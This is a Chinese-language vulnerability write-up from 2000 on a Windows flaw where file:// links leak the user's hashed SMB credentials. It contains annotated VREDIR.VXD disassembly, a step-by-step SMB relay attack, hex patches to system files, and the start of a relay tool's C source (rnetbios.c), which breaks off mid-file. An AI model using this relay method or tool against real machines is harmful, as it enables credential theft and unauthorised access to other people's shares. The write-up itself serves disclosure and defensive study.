WINDOWS密码泄露漏洞分析

发布日期:2002-09-19
文章内容:
日期:2000-04-12


作者:袁哥 < mailto: yuange@nsfocus.com >
主页: http://www.nsfocus.com        
  
漏洞说明:

WINDOWS系统访问共享文件时(file://协议,可以在HTM里面夹杂此协议),
会自动试着以当前用户的身份连接(发送用户名、加密的密码),如果不能
连接才提示用户输入用户名和密码,所以造成密码泄漏。

影响版本:WIN95、WIN98、WINNT、WIN2000。

补救措施:找微软。
  
  下面是WIN98系统的泄露密码相关代码分析。这是文件VREDIR.VXD的一段代码:

    ; ------------------------------------------------------------------
    ; sub_0285 -- VREDIR.VXD (Win98) routine that fills in the client's
    ; SMB session-setup request (the packet the C tool below refers to by
    ; its command byte 0x73) in the buffer at PARAMETER_4.
    ; This is a disassembly listing (offset, opcode bytes, mnemonic), not
    ; assemblable source; the author cut it off after offset 15AC0, so
    ; there is no endp and the final call is not shown.
    ;
    ; Register / local roles as far as this listing shows them:
    ;   edi     = PARAMETER_1; [edi+5] indexes data_0114, [edi+1Ch] -> esi
    ;   ebx     = PARAMETER_4, the output packet; [ebx] receives 0Dh and
    ;             [ebx+1] 0FFh, i.e. ebx points at the WordCount byte.
    ;   edx     = PARAMETER_3, a per-session record: [edx+19h] is the
    ;             security-mode byte, [edx+1Ah] a flag word, [edx+6Ch]
    ;             the block handed to the password helpers (the author
    ;             identifies it as the server-supplied key/challenge).
    ;   LOCAL_2 = data_0114[[edi+5]*4], the logged-on user's record:
    ;             name string at +13h, password at +5 (see 1588F..15895).
    ;   LOCAL_1 = pointer to the password that will actually be used.
    ; The packet offsets used here ([ebx+0Fh] / [ebx+11h] password
    ; lengths, [ebx+1Bh] byte count, [ebx+1Dh] first data byte) line up
    ; with the 0x33 / 0x35 / 0x41 offsets the C tool below reads from the
    ; 0x73 packet (0x24 = WordCount after the NetBIOS + SMB headers).
    ; ------------------------------------------------------------------
    15760  sub_0285        proc    near
    15760  55              push    ebp
    15761  8B EC           mov    ebp,esp
    15763  83 EC 0C        sub    esp,0Ch
    15766  33 C0           xor    eax,eax  
    15768  53              push    ebx
    15769  56              push    esi
    1576A  57              push    edi
    1576B  8B 7D 08        mov    edi,dword ptr [ebp+PARAMETER_1]
    1576E  8B 5D 14        mov    ebx,dword ptr [ebp+PARAMETER_4]
; [ebx+1] = AndXCommand 0FFh (no chained command), [ebx+2] = 0
    15771  66| C7 43 01 00FF    mov    word ptr [ebx+1],0FFh
    15777  8B 77 1C        mov    esi,dword ptr [edi+1Ch]
; eax was zeroed above, so eax = the byte [edi+5] (table index)
    1577A  8A 47 05        mov    al,byte ptr [edi+5]
    1577D  8B 55 10        mov    edx,dword ptr [ebp+PARAMETER_3]
; WordCount = 0Dh
    15780  C6 03 0D        mov    byte ptr [ebx],0Dh
; LOCAL_2 = data_0114[index] -- the current user's record, may be 0
    15783  8B 0C 85 00000AE0    mov    ecx,dword ptr data_0114[eax*4]    ;
    1578A  8B 45 18        mov    eax,dword ptr [ebp+PARAMETER_5]
    1578D  66| 89 43 05    mov    word ptr [ebx+5],ax
    15791  89 4D F8        mov    dword ptr [ebp+LOCAL_2],ecx
;the login user block (user information block)
    15794  66| 0F B6 4A 18 movzx    cx,byte ptr [edx+18h]
    15799  66| 89 4B 07    mov    word ptr [ebx+7],cx
    1579D  8D 42 2C        lea    eax,dword ptr [edx+2Ch]  
    157A0 ?0               push    eax
    157A1  E8 FFFFFADA     call    sub_0282  
; [ebx+9] = low word returned by sub_0282(PARAMETER_3+2Ch)
    157A6  66| 89 43 09    mov    word ptr [ebx+9],ax
    157AA  83 C4 04        add    esp,4
    157AD  C7 43 13 00000000    mov    dword ptr [ebx+13h],0
    157B4  8B 55 10        mov    edx,dword ptr [ebp+PARAMETER_3]
    157B7  C7 43 17 00000000    mov    dword ptr [ebx+17h],0
; [ebx+0Bh] = dword copied from the session record (+28h)
    157BE  8B 4A 28        mov    ecx,dword ptr [edx+28h]
    157C1  89 4B 0B        mov    dword ptr [ebx+0Bh],ecx
;key
; Build the dword at [ebx+17h] from the flag word [edx+1Ah]:
;   bit 200h set            -> eax = 4  (cmp ax,1 / adc eax,-1 / and 4)
;   either of bits 0..1 set -> ecx = 1  (cmp cx,1 / sbb / inc)
;   [ebx+17h] = ecx | eax
    157C4  66| 8B 4A 1A    mov    cx,word ptr [edx+1Ah]
    157C8  66| 8B C1       mov    ax,cx
    157CB  66| 25 0200     and    ax,200h
    157CF  66| 3D 0001     cmp    ax,1
    157D3  B8 00000000     mov    eax,0
    157D8  83 D0 FF        adc    eax,0FFFFFFFFh
    157DB  66| 83 E1 03    and    cx,3
    157DF  83 E0 04        and    eax,4
    157E2  66| 83 F9 01    cmp    cx,1
    157E6  89 43 17        mov    dword ptr [ebx+17h],eax
    157E9  1B C9           sbb    ecx,ecx
    157EB  41              inc    ecx
    157EC  0B C8           or    ecx,eax
    157EE  83 7D F8 00     cmp    dword ptr [ebp+LOCAL_2],0
    157F2  89 4B 17        mov    dword ptr [ebx+17h],ecx
; no logged-on user record -> loc_1740 (empty credentials)
    157F5  0F 84 00000244  jz    loc_1740  
; cl = security-mode byte of the session record
    157FB  8A 4A 19        mov    cl,byte ptr [edx+19h]

; SECURITY  MODE  
;this value is data sent by the server, so the server can set it however it wants

; bit 0 clear = share-level security -> loc_1739 (user name only, no password)
    157FE  F6 C1 01        test    cl,1
    15801  0F 84 000001CB  jz    loc_1739  

; USER OR SHARE MODE  
;branch for share-level control
; [edi+5] == 2: use the two 24-byte blocks already stored in the user record
; ([LOCAL_2+28h] and [LOCAL_2+2Ch]); anything else -> loc_1729 (password string)
    15807  80 7F 05 02     cmp    byte ptr [edi+5],2
    1580B  75 53           jne    short loc_1729
    1580D  8B 45 F8        mov    eax,dword ptr [ebp+LOCAL_2]
    15810  8B 70 28        mov    esi,dword ptr [eax+28h]
    15813  85 F6           test    esi,esi
    15815  74 12           jz    short loc_1726
; copy 6 dwords (24 bytes) from [LOCAL_2+28h] to the packet data area
    15817  8D 7B 1D        lea    edi,dword ptr [ebx+1Dh]
    1581A  B9 00000006     mov    ecx,6
    1581F  F3/ A5          rep    movsd  
; first password length = 18h (24)
    15821  66| C7 43 0F 0018        mov    word ptr [ebx+0Fh],18h

;PASSWORD LENGTH

    15827  EB 06           jmp    short loc_1727
    15829            loc_1726:  
    15829  66| C7 43 0F 0000        mov    word ptr [ebx+0Fh],0
    1582F            loc_1727:  
; second block from [LOCAL_2+2Ch], placed right after the first one
; (edi = ebx + 1Dh + first length); second length = 18h or 0
    1582F  33 C0            xor    eax,eax
    15831  8B 4D F8         mov    ecx,dword ptr [ebp+LOCAL_2]
    15834  66| 8B 43 0F     mov    ax,word ptr [ebx+0Fh]
    15838  8B 71 2C         mov    esi,dword ptr [ecx+2Ch]
    1583B  85 F6            test    esi,esi
    1583D  8D 7C 18 1D      lea    edi,dword ptr [eax+1Dh][ebx]  
    15841  74 12            jz    short loc_1728  
    15843  B9 00000006      mov    ecx,6
    15848  F3/ A5           rep    movsd  
    1584A  66| C7 43 11 0018        mov    word ptr [ebx+11h],18h
    15850  E9 000000E8      jmp    loc_1736  
    15855            loc_1728:              
    15855  66| C7 43 11 0000mov    word ptr [ebx+11h],0
    1585B  E9 000000DD      jmp    loc_1736  
    15860            loc_1729:              
; LOCAL_1 defaults to the constant 1A78h (presumably a fixed string in
; the VxD -- not shown here); it is replaced below when a password
; string is found at +35h of either record whose +1Ch has bit 20h set
    15860  C7 45 FC 00001A78 mov    dword ptr [ebp+LOCAL_1],1A78h
    15867  F6 46 1C 20      test    byte ptr [esi+1Ch],20h
    1586B  74 08            jz    short loc_1730  
    1586D  83 C6 35         add    esi,35h
    15870  89 75 FC         mov    dword ptr [ebp+LOCAL_1],esi
    15873  EB 12            jmp    short loc_1731  
    15875            loc_1730:                  
    15875  8B 55 10         mov    edx,dword ptr [ebp+PARAMETER_3]
    15878  8B 42 0C         mov    eax,dword ptr [edx+0Ch]
    1587B  F6 40 1C 20      test    byte ptr [eax+1Ch],20h  
    1587F  74 06            jz    short loc_1731      
    15881  83 C0 35         add    eax,35h
;THE PASSWORD POINTER
    15884  89 45 FC         mov    dword ptr [ebp+LOCAL_1],eax
    15887            loc_1731:  
    15887  8B 45 FC         mov    eax,dword ptr [ebp+LOCAL_1]
; is the selected password string empty?
    1588A  80 38 00         cmp    byte ptr [eax],0;
;THE PASSWORD
    1588D  75 09            jne    short loc_1732
;check whether a password was supplied; if there is none, substitute the user's own
;because several connection attempts are made before the password prompt ever
;appears, the no-password case always occurs, and so the current user's password leaks
    1588F  8B 45 F8         mov    eax,dword ptr [ebp+LOCAL_2]
    15892  83 C0 05         add    eax,5
    15895  89 45 FC         mov    dword ptr [ebp+LOCAL_1],eax
; the logged-on Windows user's password (LOCAL_2+5) replaces the empty-password pointer
;this is where the password-leak vulnerability originates
    15898            loc_1732:  
; bit 1 of the server's security mode: passwords encrypted (hashed) or not
    15898  F6 C1 02         test    cl,2
;are passwords encrypted? security mode sent by the server
; lengths are preset to 18h / 0 before the branch is taken
    1589B  66| C7 43 0F 0018        mov    word ptr [ebx+0Fh],18h

;PASSWORD LENGTH
    158A1  66| C7 43 11 0000        mov    word ptr [ebx+11h],0
    158A7  74 76            jz    short loc_1734
;jump taken when passwords are not encrypted
; bits 2..3 of the security mode set and [edx+14h] bit 1 clear:
; sub_0068(PARAMETER_3+6Ch, password, packet+1Dh) -- the author labels the
; output the "locked" password -- and its first 16 bytes are saved at
; PARAMETER_3+9Ch
    158A9  F6 C1 0C         test    cl,0Ch
    158AC  74 3C            jz    short loc_1733  
    158AE  8B 55 10         mov    edx,dword ptr [ebp+PARAMETER_3]
    158B1  F6 42 14 02      test    byte ptr [edx+14h],2
    158B5  75 33            jnz    short loc_1733
    158B7  8D 73 1D         lea    esi,dword ptr [ebx+1Dh]
    158BA  8B 45 FC         mov    eax,dword ptr [ebp+LOCAL_1]
    158BD  56               push    esi
    158BE  50               push    eax
    158BF  8D 42 6C         lea    eax,dword ptr [edx+6Ch]
    158C2  50               push    eax
    158C3  E8 FFFF15F4      call    sub_0068
;LOCK THE PASSWORD
    158C8  83 C4 0C         add    esp,0Ch
    158CB  8B 4D 10         mov    ecx,dword ptr [ebp+PARAMETER_3]
    158CE  81 C1 0000009C   add    ecx,9Ch
    158D4  8B 06            mov    eax,[esi]
    158D6  89 01            mov    [ecx],eax
    158D8  8B 56 04                mov    edx,dword ptr [esi+4]
    158DB  89 51 04                mov    dword ptr [ecx+4],edx
    158DE  8B 7E 08                mov    edi,dword ptr [esi+8]
    158E1  89 79 08                mov    dword ptr [ecx+8],edi
    158E4  8B 46 0C                mov    eax,dword ptr [esi+0Ch]
    158E7  89 41 0C                mov    dword ptr [ecx+0Ch],eax
    158EA            loc_1733:  
; sub_0067(PARAMETER_3+6Ch, password, packet+1Dh): the response that is
; actually transmitted is written into the packet data area
    158EA  8D 73 1D                lea    esi,dword ptr [ebx+1Dh]
    158ED  8B 45 FC                mov    eax,dword ptr [ebp+LOCAL_1]
    158F0  56                    push    esi
    158F1  50                    push    eax
    158F2  8B 45 10                mov    eax,dword ptr [ebp+PARAMETER_3]
    158F5  83 C0 6C                add    eax,6Ch
    158F8  50                    push    eax
    158F9  E8 FFFF15B8            call    sub_0067  
    158FE  83 C4 0C                add    esp,0Ch
; same condition as above: also keep a 24-byte copy at data_0010[edx]
    15901  8B 55 10                mov    edx,dword ptr [ebp+PARAMETER_3]
    15904  F6 42 19 0C            test    byte ptr [edx+19h],0Ch
    15908  74 33                jz    short loc_1736
    1590A  F6 42 14 02            test    byte ptr [edx+14h],2
    1590E  75 2D                jnz    short loc_1736
    15910  8D BA 00000084            lea    edi,dword ptr data_0010[edx]
    15916  B9 00000006            mov    ecx,6
    1591B  F3/ A5                rep    movsd  
    1591D  EB 1E                jmp    short loc_1736
    1591F            loc_1734:  
;unencrypted-password path lands here  
1591F  80 3D 000001E0 00        cmp    byte ptr data_0041,0    ; plaintext allowed?
; are plaintext passwords permitted?
;this is the ENABLEPLAINTEXTPASSWORD registry setting; fortunately the default
;is currently "not allowed", otherwise the plaintext password could be obtained
    15926  74 0F                     je    short loc_1735
; plaintext allowed: copy 24 bytes of the password string as-is
    15928  8D 7B 1D                lea    edi,dword ptr [ebx+1Dh]
    1592B  8B 75 FC                mov    esi,dword ptr [ebp+LOCAL_1]
    1592E  B9 00000006              mov    ecx,6
    15933  F3/ A5                    rep    movsd  
;THE PASSWORD  ,NOT LOCKED
    15935  EB 06                     jmp    short loc_1736  
    15937            loc_1735:  
; plaintext not allowed: first password length = 0
    15937  66| C7 43 0F 0000        mov    word ptr [ebx+0Fh],0
    1593D            loc_1736:  
; eax = strlen(user name at LOCAL_2+13h) + 1 (repne scasb / not ecx counts the NUL)
    1593D  8B 75 F8                mov    esi,dword ptr [ebp+LOCAL_2]
    15940  B9 FFFFFFFF            mov    ecx,0FFFFFFFFh
    15945  83 C6 13                add    esi,13h
    15948  2B C0                sub    eax,eax
    1594A  8B FE                mov    edi,esi
    1594C  F2/ AE                repne    scasb  
    1594E  F7 D1                not    ecx
    15950  8B C1                mov    eax,ecx
; edi = LOCAL_1 = packet+1Dh + len1 + len2: where the user name goes
    15952  33 D2                xor    edx,edx
    15954  66| 8B 53 11            mov    dx,word ptr [ebx+11h]
    15958  33 C9                xor    ecx,ecx
    1595A  66| 8B 4B 0F            mov    cx,word ptr [ebx+0Fh]
    1595E  03 CA                add    ecx,edx
    15960  8B 55 10                mov    edx,dword ptr [ebp+PARAMETER_3]
    15963  8D 7C 19 1D            lea    edi,dword ptr [ecx+1Dh][ebx]
    15967  66| 8B 4A 1A            mov    cx,word ptr [edx+1Ah]
    1596B  89 7D FC                mov    dword ptr [ebp+LOCAL_1],edi
; flag word bits 200h and 80h set, and data_0161 nonzero: alternate
; (presumably wide-string) encoding via sub_0097; the destination is first
; padded to an even offset relative to PARAMETER_2 and the pad byte is
; added to the byte count
    1596E  F6 C5 02                test    ch,2
    15971  74 2F                jz    short loc_1737
    15973  F6 C1 80                test    cl,80h
    15976  74 2A                jz    short loc_1737
    15978  83 3D 0000190C 00        cmp    dword ptr data_0161,0
    1597F  74 21                je    short loc_1737  
    15981  8B CF                mov    ecx,edi
    15983  6A 01                push    dword ptr 1
    15985  2B 4D 0C                sub    ecx,dword ptr [ebp+PARAMETER_2]
    15988  50                    push    eax
    15989  83 E1 01                and    ecx,1
    1598C  56                    push    esi
    1598D  66| 01 4B 1B            add    word ptr [ebx+1Bh],cx
    15991  01 4D FC                add    dword ptr [ebp+LOCAL_1],ecx
    15994  8B 4D FC                mov    ecx,dword ptr [ebp+LOCAL_1]
    15997  51                    push    ecx
; sub_0097(dest, user name, length, 1)
    15998  E8 FFFF1679            call    sub_0097  
    1599D  83 C4 10                add    esp,10h
    159A0  EB 11                jmp    short loc_1738
    159A2            loc_1737:      
; plain byte copy of the user name (eax bytes: dwords then remainder)
    159A2  8B 7D FC                mov    edi,dword ptr [ebp+LOCAL_1]
    159A5  8B C8                mov    ecx,eax
    159A7  C1 E9 02                shr    ecx,2  
    159AA  F3/ A5                rep    movsd  
    159AC  8B C8                mov    ecx,eax
    159AE  83 E1 03                and    ecx,3
    159B1  F3/ A4                rep    movsb  
    159B3            loc_1738:  
; ByteCount [ebx+1Bh] = len1 + len2 + name length;
; [PARAMETER_2+3Ah] = pointer just past the data written so far
    159B3  66| 8B 4B 0F            mov    cx,word ptr [ebx+0Fh]
    159B7  8B 55 FC                mov    edx,dword ptr [ebp+LOCAL_1]
    159BA  66| 03 4B 11            add    cx,word ptr [ebx+11h]
    159BE  03 D0                add    edx,eax
    159C0  66| 03 C8                add    cx,ax
    159C3  66| 89 4B 1B            mov    word ptr [ebx+1Bh],cx
    159C7  8B 4D 0C                mov    ecx,dword ptr [ebp+PARAMETER_2]
    159CA  89 51 3A                mov    dword ptr [ecx+3Ah],edx
    159CD  E9 0000008A            jmp    loc_1741  
    159D2            loc_1739:  
; share-level security: two 1-byte empty passwords, then the user name
    159D2  C6 43 1D 00            mov    byte ptr [ebx+1Dh],0
    159D6  8B 75 F8                mov    esi,dword ptr [ebp+LOCAL_2]
    159D9  B9 FFFFFFFF            mov    ecx,0FFFFFFFFh
    159DE  C6 43 1E 00            mov    byte ptr [ebx+1Eh],0
    159E2  66| C7 43 11 0001        mov    word ptr [ebx+11h],1
    159E8  66| C7 43 0F 0001        mov    word ptr [ebx+0Fh],1
; edx = strlen(user name at LOCAL_2+13h) + 1
    159EE  83 C6 13                add    esi,13h
    159F1  2B C0                sub    eax,eax
    159F3  8B FE                mov    edi,esi
    159F5  F2/ AE                repne    scasb
    159F7  F7 D1                not    ecx
    159F9  8B D1                mov    edx,ecx
    159FB  33 C9                xor    ecx,ecx
    159FD  66| 8B 4B 11            mov    cx,word ptr [ebx+11h]
; ByteCount = name length + 2
    15A01  8D 42 02                lea    eax,dword ptr [edx+2]
    15A04  66| 89 43 1B            mov    word ptr [ebx+1Bh],ax
    15A08  33 C0                xor    eax,eax
    15A0A  66| 8B 43 0F            mov    ax,word ptr [ebx+0Fh]
    15A0E  03 C1                add    eax,ecx
    15A10  8B CA                mov    ecx,edx
    15A12  C1 E9 02                shr    ecx,2  
    15A15  8D 7C 18 1D            lea    edi,dword ptr [eax+1Dh][ebx]
    15A19  F3/ A5                rep    movsd  
; THE USER NAME    
    15A1B  8B CA                mov    ecx,edx
    15A1D  83 E1 03                and    ecx,3
    15A20  F3/ A4                rep    movsb  
; [PARAMETER_2+3Ah] = ebx + 1Dh + len1 + len2 + name length
    15A22  33 F6                xor    esi,esi
    15A24  33 C0                xor    eax,eax
    15A26  66| 8B 73 0F            mov    si,word ptr [ebx+0Fh]
    15A2A  8B 4D 0C                mov    ecx,dword ptr [ebp+PARAMETER_2]
    15A2D  66| 8B 43 11            mov    ax,word ptr [ebx+11h]
    15A31  03 F0                add    esi,eax
    15A33  03 F2                add    esi,edx
    15A35  03 F3                add    esi,ebx
    15A37  83 C6 1D                add    esi,1Dh
    15A3A  89 71 3A                mov    dword ptr [ecx+3Ah],esi
    15A3D  EB 1D                jmp    short loc_1741  
    15A3F            loc_1740:
; no user record: both lengths 0, two zero bytes, ByteCount = 2
    15A3F  33 C0                xor    eax,eax      
    15A41  8D 53 1F                lea    edx,dword ptr [ebx+1Fh]
    15A44  66| 89 43 0F            mov    word ptr [ebx+0Fh],ax
    15A48  66| 89 43 11            mov    word ptr [ebx+11h],ax
    15A4C  66| 89 43 1D            mov    word ptr [ebx+1Dh],ax
    15A50  8B 45 0C                mov    eax,dword ptr [ebp+PARAMETER_2]
    15A53  66| C7 43 1B 0002        mov    word ptr [ebx+1Bh],2
    15A59  89 50 3A                mov    dword ptr [eax+3Ah],edx
    15A5C            loc_1741:  
; same flag-word / data_0161 test as at 1596E; when it holds, the string
; at LOCAL_2+30h (if the record exists and the string is non-empty),
; otherwise the constant string at 21D2h, is measured and its length and
; address pushed for a call that lies beyond the end of this listing
    15A5C  8B 55 10                mov    edx,dword ptr [ebp+PARAMETER_3]
    15A5F  66| 8B 42 1A            mov    ax,word ptr [edx+1Ah]
    15A63  F6 C4 02                test    ah,2
    15A66  0F 84 000000C9            jz    loc_1744
    15A6C  A8 80                test    al,80h
    15A6E  0F 84 000000C1            jz    loc_1744
    15A74  83 3D 0000190C 00        cmp    dword ptr data_0161,0
    15A7B  0F 84 000000B4            je    loc_1744
    15A81  8B 4D 0C                mov    ecx,dword ptr [ebp+PARAMETER_2]
    15A84  83 7D F8 00            cmp    dword ptr [ebp+LOCAL_2],0
; LOCAL_1 = current end-of-data pointer
    15A88  8B 71 3A                mov    esi,dword ptr [ecx+3Ah]
    15A8B  89 75 FC                mov    dword ptr [ebp+LOCAL_1],esi
    15A8E  74 1E                jz    short loc_1742
    15A90  8B 55 F8                mov    edx,dword ptr [ebp+LOCAL_2]
    15A93  83 C2 30                add    edx,30h
    15A96  80 3A 00                cmp    byte ptr [edx],0
    15A99  74 13                je    short loc_1742
    15A9B  8B FA                mov    edi,edx
    15A9D  B9 FFFFFFFF            mov    ecx,0FFFFFFFFh
    15AA2  2B C0                sub    eax,eax
    15AA4  6A 01                push    dword ptr 1
    15AA6  F2/ AE                repne    scasb  
    15AA8  F7 D1                not    ecx
    15AAA  51                    push    ecx
    15AAB  52                    push    edx
    15AAC  EB 18                jmp    short loc_1743
    15AAE            loc_1742:  
    15AAE  BF 000021D2            mov    edi,21D2h
    15AB3  B9 FFFFFFFF            mov    ecx,0FFFFFFFFh
    15AB8  2B C0                sub    eax,eax
    15ABA  6A 01                push    dword ptr 1
    15ABC  F2/ AE                repne    scasb  
    15ABE  F7 D1                not    ecx
; listing ends here (sic: "pushecx"); loc_1743 / loc_1744 and the call
; that consumes these arguments are not shown
    15AC0  51                    pushecx
  


这得到的密码一般是加密的,但可以离线破解,其实还有一个攻击。让我们先来
看看SMB的连接过程。下面是SMB的密码认证方式、WINDOWS的139口的访问过程,
箭头表示数据方向:
1、客户端<--------------------建立TCP连接----------------->服务端
2、客户端-------客户端类型、支持的服务方式列表等----------->服务端
3、客户端<------服务器支持协议、认证方式、加密用的key等-----服务端
认证方式指的是用户级认证还是共享级认证、以及密码是否加密,key是服务器随机生成的
8个字节,WIN2000已经支持16个字节的 key。
4、客户端--------------用户名、加密后密码----------------->服务端
WIN9X、WINNT、WIN2000这有个漏洞,不经过提示等就把当前用户名,密码加密后
发过去了,导致密码泄漏。这儿加密是DES的变形,lockedpass=chgdes(key,pass)。
这儿的pass是作为DES变形的KEY,key是作为DES变形的待加密数据。
5、客户端<---------------认证成功否-----------------------服务端
WINDOWS客户端第4步有漏洞,显然服务端可以得到username和
lockedpass=chgdes(key,pass), 其中key可以自由指定,因为这是服务方提供的,
username、pass是客户端当前访问者的用户名和密码。这儿的加密变换不可逆,但已经
可以用暴力法破解了,也已经有了这样的程序。其实我们有时并不一定要得到密码
明文的,只要能提供连接需要的就可以了。我们来看得到lockedpass有什么用,我
们反过去访问看看,telnet、ftp等连接要密码明文我们得到的lockedpass不能提
供,那么我们考虑用同样加密算法传密码密文的服务呢?比如就是NETBIOS共享服
务。前面是服务端得到东西,那现在就是站在客户端了,再看前面那过程,显然其
实我们并不需要提供pass,是不是只需要提供username和lockedpass2=chgdes(key2,pass)
就可以了?其中key2是现在的服务端提供的。看看我们有
username和lockedpass=chgdes(key,pass),其中key我们可以自己指定,大家一看显然
只要key=key2,那么需要的我们就都有了,是不是?所以我们要使得key=key2。
好,让我们再仔细看看连接过程,别人连接两步1、2:
1、客户端<--------------------建立TCP连接----------------->服务端
2、客户端--------客户端类型、支持的服务方式列表等---------->服务端
下面就该:
3、客户端<---------服务器认证方式、加密用的key等-----------服务端
这我们需要提供key,这儿我们不能随便提供key,需要提供key2,那么我们就要得到
key2,显然需要连接NETBIOS服务回去。显然这儿需要连接回去的11、22、33共3步
(为了区分连接回去的步子用重号表示)才能得到key2,显然这2步和3步不需要有
先后顺序。所以我们可以得到连接指定IP的NETBIOS服务然后等这用户来访问,这可
能有时间超时等处理,或者等到任意IP连接NETBIOS服务后马上连回去,反正怎么处
理方便、满足需要就怎么处理。下面显然就是设置 key=key2返回3,那就等4得到
lockedpass了,第5步嘛就你自由处理了,要不返回密码错误,后面就是44、55。。。。
总的来说就是1,2,11,22,33,3,4,5,44,55……显然你就是以那台机器访
问你的用户的身份去访问他的NETBIOS服务了,能干什么那就看那用户的权限了。

下面是我做的利用这漏洞的程序,因为是为了演示这漏洞,所以程序做得不是很完
美。可以在WIN9X里面运行,因为是作为139口的守护进程,所以需要把运行机器本
身的139口关掉,可以在VNBT.386文件里面寻找HEX: 68 8B 00 00 00 (NETBIOS
开139口的代码,0x8b=139),改成68 EF 00 00 00,本身的139口就成了239口了。还
有WINNT系统的磁盘一般共享为DRIVE$,在共享里面不显示,也可以在客户端修改让
其显示,以方便查看。修改方法,文件MSNP32.DLL,找HEX :8B 74 24 10 6A 24
56 E8 ,改成 8B 74 24 10 6A FF 56 E8就可以。如果版本不一样,可能会HEX不
一样,所以如果找不到,可以找短一点的HEX,比如6A 24 ??E8,"??"表示任意
一字节数据。因为MSNP32.DLL文件始终处于打开状态,所以修改时可以先复制一
份,修改复制的,改好后启动到DOS,覆盖回去。


//   rnetbios.c
//   useage:  rnetbios [ip] [ip]

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

// Prototypes.  The definitions further down use K&R-style parameter
// lists with no types (e.g. `void printfusage(argc,argv)`), so the
// argument types declared here are not enforced at the definitions
// (the untyped parameters default to int).
void printfusage(int argc ,char *argv);
void testconnect();
void get_d_ip(int argc,char *argv);
void setserver();
void openfd3(int argc,char *argv);
void opensockfd4(int argc,char *argv);
void set_servername();
void recvpacket();
void recvfd2packet();
void out();
// Shared global state.  Every function below reads and writes these
// directly (including the counters i, j, k, l), so the order of calls in
// main() and openfd3() is load-bearing.
// NOTE(review): the "/n" sequences in the printf format strings throughout
// this listing look like a transcription of "\n" with the backslash lost.
char *server;                        // target host / IP string taken from argv
char buff[20480];                    // scratch buffer for every send/recv
char buff0x72[20480];                // saved copy of the last SMB 0x72 (negotiate) packet
char buff0x73[20480];                // saved copy of the last SMB 0x73 (session setup) packet
char buff0x82[]={0x82,0,0,0,0,0};    // NetBIOS positive session response frame
char namereq[]={0x81,0,0,0};         // first bytes of a NetBIOS session request frame
int  long72=0;                       // byte length of buff0x72
int  long73=0;                       // byte length of buff0x73

struct sockaddr_in s_in,s_in2,s_in3,s_in4;   // s_in: listen address; s_in2: relay target; s_in3: second client; s_in4: printed only
struct sockaddr addr,addr2;                  // peer addresses returned by accept()
struct hostent *he;
int usernameaddress1;                // read cursor into buff0x73 (user-name field)
int usernameaddress2;                // write cursor into buff (user-name field)
int strflg1,strflg2;                 // 1 when bit 0x80 of byte 0x0f is set in buff0x73 / buff (author: "str is unicode?")
int loginhimself;                    // 1 = relay each client back to its own address; 0 = relay to d_ip
int fd,fd2,fd3,fd4;                  // fd: listener; fd2: first client; fd3: connection to the target; fd4: second client
int i,j,k,l;                         // i: last recv/accept result; j: 1 once the fd2 login succeeded; k: 1 once fd4 was handled; l: set in main() only
SOCKET d_ip;                         // target IPv4 address (network order), -1 when none; declared as SOCKET although it holds an address

char  servername[]={"*SMBSERVER"};   // called name used in the NetBIOS session request (encoded by set_servername)
// WIN9X does not support this name, which conveniently filters out WIN9X
u_short  serverport=139;
u_short  name;                       // scratch byte shared by set_servername() and opensockfd4()
// Not referenced anywhere in this file.  By its layout it resembles a
// NetBIOS name-service query for the encoded "*" name (type 0x21).
char buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};

// NetBIOS session request: 0x81, flags, length 0x44, then the called
// name (32 encoded chars, overwritten by set_servername at [5..36]) and
// the calling name.  Total 0x48 bytes, which is what openfd3() sends.
char namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,
0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46,0x43,0x45,0x4d,
0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00,0x20,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x41,0x41,00};

// Entry point.  Listens on TCP 139 and, for every accepted client,
// opens a connection to the relay target (d_ip from argv[1], or the
// client's own address when loginhimself is set) and hands both sockets
// to openfd3(), which shuttles the SMB packets between them.
// Returns 0, but the while(1) loop never exits, so out() is unreachable.
int main(int argc, char **argv)
{
  
    printfusage(argc,argv[0]);
    testconnect();
    set_servername();
    get_d_ip(argc,argv[1]);
    setserver();  
    while(1){
        i=sizeof(struct sockaddr);
        fd2=-1;
        // spin until accept() returns a usable descriptor
        while(fd2<=0){
           fd2=accept(fd,&addr,&i);
        }
        // NOTE(review): copies 15 of the 16 bytes of `addr`; sizeof would
        // be the conventional length here
        memcpy(&s_in2,&addr,15);
             s_in2.sin_family = AF_INET;
        s_in2.sin_port = htons(serverport);
        if(loginhimself==1) {
            s_in4.sin_addr.s_addr=s_in2.sin_addr.s_addr;
        }
           printf("/n Now  %s ",inet_ntoa(s_in2.sin_addr));
        printf("begin netbios connect %s",inet_ntoa(s_in4.sin_addr));
        // otherwise the target is the address resolved in get_d_ip()
        if(loginhimself==0) s_in2.sin_addr.s_addr=d_ip;
        fd3 = socket(AF_INET, SOCK_STREAM,0);
         j=0;
        k=0;
        l=0;
        // NOTE(review): argv[2] is read without checking argc; with a
        // single argument this indexes past the argv array (argv[argc]
        // is the terminating NULL).  openfd3 only uses it when argc>=3.
        openfd3(argc,argv[2]);
        printf("/n can't connect %s",inet_ntoa(s_in2.sin_addr));
        closesocket(fd2);
        closesocket(fd3);
    }
    out();
    return(0);
}

// Prints the banner and usage line.  K&R definition: argc and argv are
// untyped (implicit int) even though the prototype declares argv as
// char*; main() passes argv[0] and the value is printed with %s.
void printfusage(argc,argv)  
{
    printf("/n rnetbios ver 1.0.");
    printf("/n copywrite by yuange 2000.4.7.");
    printf("/n wellcome to my homepage http://yuange.yeah.net.");
    printf("/n usage:  %s [ip] [ip]",argv);
    //argv[0]);
}
// Initialises Winsock 1.1 and exits the process if that fails.  The
// message text is misleading: WSAStartup failing says nothing about
